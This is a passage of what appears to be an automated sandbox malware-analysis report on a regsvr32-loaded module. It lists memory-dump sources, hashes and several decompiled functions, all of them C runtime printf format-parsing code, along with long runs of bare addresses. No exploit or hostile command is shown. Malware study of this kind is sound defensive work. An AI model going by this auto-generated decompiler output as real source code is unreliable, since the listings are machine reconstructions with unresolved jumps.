                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                        • API String ID: 530996419-3826063230
                                                                                        • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                        • Instruction ID: d6c85ddd6a9fac6d59453cfc6279b165f514207326055716b4e5bf0dd1bf0ecb
                                                                                        • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                        • Instruction Fuzzy Hash: 0A916F72A0D6C68AE3F08B54E88477EB7E4E385342F601026D7CD87AA9CB7ED5418F11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                                                                        
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}



                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                        • API String ID: 530996419-4206863317
                                                                                        • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                        • Instruction ID: 52af39986bd237b596cdecada1f5af7c0900048515ebe490badd59f4da94dd67
                                                                                        • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                        • Instruction Fuzzy Hash: 35910A62A0C6C18AE7F08B55E88077EB3E1F385756F600026E6CD87AA4DB7ED855DF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 27%
                                                                                        			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                        				void* _t171;
                                                                                        				char* _t191;
                                                                                        				char* _t192;
                                                                                        
                                                                                        				_a968 = _a696 & 0x000000ff;
                                                                                        				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                                                        				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                                                        				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                                                        				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                                                        				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000001;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000002;
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				asm("bts eax, 0x7");
                                                                                        				goto 0xf9d3bd7d;
                                                                                        				_a80 = _a80 | 0x00000008;
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                                                        				_t191 =  &_a1112;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t191);
                                                                                        				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3bdd5;
                                                                                        				_a88 = _t171 + _t191 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                                        				_t192 =  &_a1112;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t192);
                                                                                        				if (_a116 >= 0) goto 0xf9d3be14;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3be2d;
                                                                                        				_a116 = _t171 + _t192 - 0x30;
                                                                                        				_a972 = _a696 & 0x000000ff;
                                                                                        				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                                        				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                                        				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                                        				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                                        				_a1096 = _a1096 + 1;
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3beb2;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				_a704 = 0;
                                                                                        				goto E000007FE7FEF9D3BB66;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3bd02
                                                                                        0x7fef9d3bd11
                                                                                        0x7fef9d3bd1b
                                                                                        0x7fef9d3bd25
                                                                                        0x7fef9d3bd2f
                                                                                        0x7fef9d3bd39
                                                                                        0x7fef9d3bd3b
                                                                                        0x7fef9d3bd44
                                                                                        0x7fef9d3bd48
                                                                                        0x7fef9d3bd51
                                                                                        0x7fef9d3bd55
                                                                                        0x7fef9d3bd5e
                                                                                        0x7fef9d3bd62
                                                                                        0x7fef9d3bd68
                                                                                        0x7fef9d3bd70
                                                                                        0x7fef9d3bd79
                                                                                        0x7fef9d3bd8d
                                                                                        0x7fef9d3bd8f
                                                                                        0x7fef9d3bd9c
                                                                                        0x7fef9d3bda5
                                                                                        0x7fef9d3bdae
                                                                                        0x7fef9d3bdb8
                                                                                        0x7fef9d3bdbc
                                                                                        0x7fef9d3bdd1
                                                                                        0x7fef9d3bdda
                                                                                        0x7fef9d3bdf2
                                                                                        0x7fef9d3bdf4
                                                                                        0x7fef9d3be01
                                                                                        0x7fef9d3be0a
                                                                                        0x7fef9d3be0c
                                                                                        0x7fef9d3be14
                                                                                        0x7fef9d3be29
                                                                                        0x7fef9d3be3a
                                                                                        0x7fef9d3be49
                                                                                        0x7fef9d3be53
                                                                                        0x7fef9d3be61
                                                                                        0x7fef9d3be6b
                                                                                        0x7fef9d3be71
                                                                                        0x7fef9d3be84
                                                                                        0x7fef9d3be91
                                                                                        0x7fef9d3be9d
                                                                                        0x7fef9d3bea5
                                                                                        0x7fef9d3beae
                                                                                        0x7fef9d3beb2
                                                                                        0x7fef9d3bebb
                                                                                        0x7fef9d3bed1
                                                                                        0x7fef9d3bee2
                                                                                        0x7fef9d3bef0
                                                                                        0x7fef9d3befc
                                                                                        0x7fef9d3bf04
                                                                                        0x7fef9d3bf17
                                                                                        0x7fef9d3bf28
                                                                                        0x7fef9d3bf36
                                                                                        0x7fef9d3bf42
                                                                                        0x7fef9d3bf4a
                                                                                        0x7fef9d3bf5a
                                                                                        0x7fef9d3bf6a
                                                                                        0x7fef9d3bf7a
                                                                                        0x7fef9d3bf8a
                                                                                        0x7fef9d3bf9a
                                                                                        0x7fef9d3bfaa
                                                                                        0x7fef9d3bfac
                                                                                        0x7fef9d3bfae
                                                                                        0x7fef9d3bfb9
                                                                                        0x7fef9d3bfbe
                                                                                        0x7fef9d3bfc7
                                                                                        0x7fef9d3bfcb
                                                                                        0x7fef9d3bfd1
                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 530996419-4087627031
                                                                                        • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                        • Instruction ID: f671f2f81670ff54d1d55a26610e2e3881df7bf560f190d6bc7d2e9ce8938301
                                                                                        • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                        • Instruction Fuzzy Hash: 8B517E72A0D6C28AF3F18B64E855BBEB7E4F384345F600126D2C9869A9DB7DE540CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 27%
                                                                                        			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                        				void* _t171;
                                                                                        				char* _t191;
                                                                                        				char* _t192;
                                                                                        
                                                                                        				_a1404 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                                                        				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                                                        				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                                                        				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                                                        				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000001;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000002;
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				asm("bts eax, 0x7");
                                                                                        				goto 0xf9d3dd2b;
                                                                                        				_a80 = _a80 | 0x00000008;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                                        				_t191 =  &_a1560;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t191);
                                                                                        				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3dd83;
                                                                                        				_a88 = _t171 + _t191 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                                        				_t192 =  &_a1560;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t192);
                                                                                        				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3dddb;
                                                                                        				_a116 = _t171 + _t192 - 0x30;
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3dcb0
                                                                                        0x7fef9d3dcbf
                                                                                        0x7fef9d3dcc9
                                                                                        0x7fef9d3dcd3
                                                                                        0x7fef9d3dcdd
                                                                                        0x7fef9d3dce7
                                                                                        0x7fef9d3dce9
                                                                                        0x7fef9d3dcf2
                                                                                        0x7fef9d3dcf6
                                                                                        0x7fef9d3dcff
                                                                                        0x7fef9d3dd03
                                                                                        0x7fef9d3dd0c
                                                                                        0x7fef9d3dd10
                                                                                        0x7fef9d3dd16
                                                                                        0x7fef9d3dd1e
                                                                                        0x7fef9d3dd27
                                                                                        0x7fef9d3dd3b
                                                                                        0x7fef9d3dd3d
                                                                                        0x7fef9d3dd4a
                                                                                        0x7fef9d3dd53
                                                                                        0x7fef9d3dd5c
                                                                                        0x7fef9d3dd66
                                                                                        0x7fef9d3dd6a
                                                                                        0x7fef9d3dd7f
                                                                                        0x7fef9d3dd88
                                                                                        0x7fef9d3dda0
                                                                                        0x7fef9d3dda2
                                                                                        0x7fef9d3ddaf
                                                                                        0x7fef9d3ddb8
                                                                                        0x7fef9d3ddba
                                                                                        0x7fef9d3ddc2
                                                                                        0x7fef9d3ddd7
                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 530996419-1247675978
                                                                                        • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                        • Instruction ID: decea58dbdbd6501be5c610137b77bb3c0dc28cbce38a3a9de9bceb14a18b164
                                                                                        • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                        • Instruction Fuzzy Hash: 1F510CB2A0C6C68AE7B09B64F8407BEB7E0F385346F600125D6C9869A8D77DE444DF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 26%
                                                                                        			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                        				void* _t139;
                                                                                        				char* _t159;
                                                                                        				char* _t160;
                                                                                        
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                                                        				_t159 =  &_a1112;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t159);
                                                                                        				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3bdd5;
                                                                                        				_a88 = _t139 + _t159 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                                        				_t160 =  &_a1112;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t160);
                                                                                        				if (_a116 >= 0) goto 0xf9d3be14;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3be2d;
                                                                                        				_a116 = _t139 + _t160 - 0x30;
                                                                                        				_a972 = _a696 & 0x000000ff;
                                                                                        				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                                        				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                                        				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                                        				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                                        				_a1096 = _a1096 + 1;
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3beb2;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				_a704 = 0;
                                                                                        				goto E000007FE7FEF9D3BB66;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3bd8d
                                                                                        0x7fef9d3bd8f
                                                                                        0x7fef9d3bd9c
                                                                                        0x7fef9d3bda5
                                                                                        0x7fef9d3bdae
                                                                                        0x7fef9d3bdb8
                                                                                        0x7fef9d3bdbc
                                                                                        0x7fef9d3bdd1
                                                                                        0x7fef9d3bdda
                                                                                        0x7fef9d3bdf2
                                                                                        0x7fef9d3bdf4
                                                                                        0x7fef9d3be01
                                                                                        0x7fef9d3be0a
                                                                                        0x7fef9d3be0c
                                                                                        0x7fef9d3be14
                                                                                        0x7fef9d3be29
                                                                                        0x7fef9d3be3a
                                                                                        0x7fef9d3be49
                                                                                        0x7fef9d3be53
                                                                                        0x7fef9d3be61
                                                                                        0x7fef9d3be6b
                                                                                        0x7fef9d3be71
                                                                                        0x7fef9d3be84
                                                                                        0x7fef9d3be91
                                                                                        0x7fef9d3be9d
                                                                                        0x7fef9d3bea5
                                                                                        0x7fef9d3beae
                                                                                        0x7fef9d3beb2
                                                                                        0x7fef9d3bebb
                                                                                        0x7fef9d3bed1
                                                                                        0x7fef9d3bee2
                                                                                        0x7fef9d3bef0
                                                                                        0x7fef9d3befc
                                                                                        0x7fef9d3bf04
                                                                                        0x7fef9d3bf17
                                                                                        0x7fef9d3bf28
                                                                                        0x7fef9d3bf36
                                                                                        0x7fef9d3bf42
                                                                                        0x7fef9d3bf4a
                                                                                        0x7fef9d3bf5a
                                                                                        0x7fef9d3bf6a
                                                                                        0x7fef9d3bf7a
                                                                                        0x7fef9d3bf8a
                                                                                        0x7fef9d3bf9a
                                                                                        0x7fef9d3bfaa
                                                                                        0x7fef9d3bfac
                                                                                        0x7fef9d3bfae
                                                                                        0x7fef9d3bfb9
                                                                                        0x7fef9d3bfbe
                                                                                        0x7fef9d3bfc7
                                                                                        0x7fef9d3bfcb
                                                                                        0x7fef9d3bfd1
                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
